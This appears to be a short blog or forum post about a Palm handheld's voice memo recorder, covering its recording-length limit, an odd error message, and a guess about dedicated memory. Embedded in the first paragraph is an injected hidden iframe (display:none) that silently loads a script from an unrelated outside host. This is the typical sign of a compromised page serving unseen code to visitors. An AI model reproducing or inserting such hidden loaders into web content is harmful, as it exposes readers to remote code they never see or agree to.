Voice recorder

Seems a pity the voice recorder doesn't support record-to-card and therefore longer recordings. If I'm not mistaken it's limited to 60 sec even with plenty of internal RAM free. I'd like to have it as emergency backup tape recorder for interviews. A harder problem for them, hardware wise, would be to permit recording your phone conversation -- but I seem to recall one of my old phones (the Qualcomm 860, or was it a Siemens?) allowed that.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Actually, it was an early version of the documentation, I think, that described a 60 second limit. I just finally tried it and it quit at 4:56, with oddly phrased error saying voice memo memory was empty. Starting a new voice memo, without deleting the old, gave same error. Funny thing is that the internal memory of the Palm was 1801k free.

I tried another voice memo, immediately after doing a "snapshot" with InWatch. It showed no change from before to after.

Provisionally I conclude that the voice memo records to a dedicated chip. I don't know that, just guessing.
